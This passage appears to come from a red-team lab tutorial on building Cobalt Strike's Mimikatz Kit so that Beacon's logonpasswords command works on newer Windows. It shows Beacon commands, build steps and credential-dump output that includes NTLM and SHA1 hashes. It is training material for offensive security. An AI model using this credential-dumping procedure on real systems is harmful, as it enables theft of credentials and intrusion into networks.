You may have noticed instances in the lab where you've tried to run commands such as sekurlsa::logonpasswords and sekurlsa::ekeys, only to receive the following error:
beacon> run hostname
web
beacon> getuid
[*] You are NT AUTHORITY\SYSTEM (admin)
beacon> logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
This is simply because the version of Mimikatz built into Cobalt Strike by default is not recent enough to work on later versions of Windows such as 11 and Server 2022. The Mimikatz Kit allows you to bring alternate builds of Mimikatz into CS to overcome this limitation.
Confusingly, CS is actually bundled with multiple flavours of Mimikatz in both x86 and x64 builds.
The "max" versions include the complete Mimikatz codebase, which can be used with CS 4.6 and above as the 1 MB limit can be removed. The "full" versions have some code stripped out to reduce the file size (although no official documentation seems to exist that explains exactly what is removed); and the "chrome" versions contain code pertinent to Beacon's chromedump command. Again, no documentation seems to exist that states which parts of the Mimikatz codebase this is, but I suspect it's at least dpapi::chrome.
ubuntu@DESKTOP-3BSK7NO /m/c/T/c/a/k/mimikatz> pwd
/mnt/c/Tools/cobaltstrike/arsenal-kit/kits/mimikatz
ubuntu@DESKTOP-3BSK7NO /m/c/T/c/a/k/mimikatz> ./build.sh /mnt/c/Tools/cobaltstrike/mimikatz
[Mimikatz kit] [+] Copying the mimikatz dlls
[Mimikatz kit] [+] Generate the mimikatz.cna from the template file.
[Mimikatz kit] [+] The Mimikatz files are saved in '/mnt/c/Tools/cobaltstrike/mimikatz'
Load mimikatz.cna via the Cobalt Strike > Script Manager menu by clicking the Load button. Once the CNA is loaded, Mimikatz will function as expected.
beacon> logonpasswords
Authentication Id : 0 ; 64753 (00000000:0000fcf1)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 1/15/2023 3:03:57 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WEB$
* Domain : DEV
* NTLM : 4b5aff0a96dfb6c6240340a6800e6f11
* SHA1 : bd13b64953a55abddf7b9c1bdcc043a9d88fd955
The DLLs are custom-built to include a Reflective DLL loader (based on original implementation) and modified code to achieve a smaller file size, which is required to work with Beacon's legacy 1 MB size limit.
The good news is that the CS dev team are making an effort to keep the version of Mimikatz inside the Mimikatz Kit up-to-date with . This means we can simply build the kit as-is and load it into CS. This is as simple as running build.sh and specifying an output directory.